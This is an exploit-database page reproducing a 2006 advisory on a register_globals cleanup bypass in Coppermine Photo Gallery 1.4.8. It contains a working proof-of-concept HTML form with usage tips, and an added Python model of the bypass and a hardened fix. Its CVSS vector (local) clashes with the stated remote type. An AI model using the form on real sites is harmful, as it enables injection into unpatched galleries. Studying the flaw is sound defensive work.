Coppermine 1.4.8 ~ Parameter Cleanup System Bypass ~ Registering Global Variables

Category: CWE-264
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2006-12-01
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006110116

Below is a copy:

-----------------Summary-----------------
Software: CPG Coppermine Photo Gallery
Software's Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.8.stable
Class: Remote
Status: Unpatched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level: High
-----------------Description-----------------
Coppermine Photo Gallery has a logical design fault that allows its anti-XSS-injection / register_globals cleanup system to be bypassed.

The routine that cleans user-supplied data checks whether a global variable exists with the same name as a key in the query string (or in the other request arrays); if so, it unsets that variable. Because of this approach, the predefined arrays themselves (e.g. $_GET and $_POST), which defined the arbitrary variables in the first place, can be deleted before the cleanup gets to delete those variables, and the cleanup system is bypassed by this trick.
Imagine that register_globals is on and you request a URL with these parameters in a mixed GET and POST request:

<form method="post" action="cpg/?MyVar=value">
<input name="_GET" type="hidden">
<input name="_REQUEST" type="hidden">
<input type="submit"></form>

MyVar is registered as a global variable with an arbitrary value before the PHP script starts its processing (because of register_globals); once the script takes over, the predefined _GET and _REQUEST variables are deleted. So our variable is inaccessible for checking and deletion, but it still exists in the global scope.
Don't forget that if you want to pass other standard parameters to the program, you should not use GET for them after this; use POST instead. That is, you inject your parameter through the GET array and pass the standard parameters (e.g. picture number or page number) via POST or similar... By the way, you should use only one of these arrays at a time.
Because of this bug, you can create your own parameters that will later be honoured by the source code.
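To make the ordering described above concrete, here is an added Python model of the cleanup logic and its bypass, written for this page and not taken from Coppermine: the global scope is a dict, register_globals=On is modelled as copying the request arrays and then every request key into it, and the cleanup walks $_GET/$_POST/$_REQUEST unsetting same-named globals, as the advisory describes. The hardened variant is an assumed fix, not the vendor's.

```python
SUPERGLOBALS = ("_GET", "_POST", "_REQUEST")


def register_globals(get: dict, post: dict) -> dict:
    """Model of register_globals=On: the request arrays, then every GET key, then every
    POST key, are copied into the global scope. A POST field named _GET therefore lands
    after $_GET was set up and replaces the array with its (empty) string value."""
    g = {"_GET": dict(get), "_POST": dict(post), "_REQUEST": {**get, **post}}
    g.update(get)   # ?MyVar=value  ->  $MyVar = 'value'
    g.update(post)  # _GET=''       ->  $_GET = ''
    return g


def vulnerable_cleanup(g: dict) -> dict:
    """Cleanup as the advisory describes it: walk each request array and unset the
    global named after each key. Once $_GET is no longer an array its keys are never
    visited, so the $MyVar it registered survives."""
    for arr in SUPERGLOBALS:
        keys = g.get(arr)
        if not isinstance(keys, dict):
            continue  # foreach over a string or missing array walks nothing
        for key in list(keys):
            g.pop(key, None)  # unset($GLOBALS[$key])
    return g


def hardened_cleanup(g: dict, trusted_get: dict, trusted_post: dict) -> dict:
    """Hardened variant (assumed fix, not the vendor's): rebuild the request arrays from
    copies the server populated before any user-chosen name was honoured, decide what to
    unset from those copies, and never let a request key alias a superglobal."""
    g["_GET"], g["_POST"] = dict(trusted_get), dict(trusted_post)
    g["_REQUEST"] = {**trusted_get, **trusted_post}
    for key in set(trusted_get) | set(trusted_post):
        if key in SUPERGLOBALS:
            continue  # a field named _GET/_POST/_REQUEST is hostile input, not a variable
        g.pop(key, None)
    return g


def survives_cleanup(get: dict, post: dict, hardened: bool = False) -> bool:
    """True if the injected $MyVar is still a global after cleanup."""
    g = register_globals(get, post)
    g = hardened_cleanup(g, get, post) if hardened else vulnerable_cleanup(g)
    return "MyVar" in g


if __name__ == "__main__":
    # Constructed requests: plain ?MyVar=value, and the advisory's form with empty POST fields _GET/_REQUEST.
    plain, trick = {"MyVar": "value"}, {"_GET": "", "_REQUEST": ""}
    print(survives_cleanup(plain, {}))                    # False: normal cleanup works
    print(survives_cleanup(plain, trick))                 # True:  the bypass
    print(survives_cleanup(plain, trick, hardened=True))  # False
```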
-----------------See Also-----------------
{include/init.inc.php}40-101
/* because of the size of the code I don't include it here */
-----------------Exploit-----------------
<form method="post" action="cpg/?MyVar=value">
<input name="_GET" type="hidden">
<input name="_REQUEST" type="hidden">
<input type="submit"></form>
-----------------Conditions-----------------
register_globals should be ON
-----------------Credit-----------------
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security 



Copyright ©2024 Exploitalert.
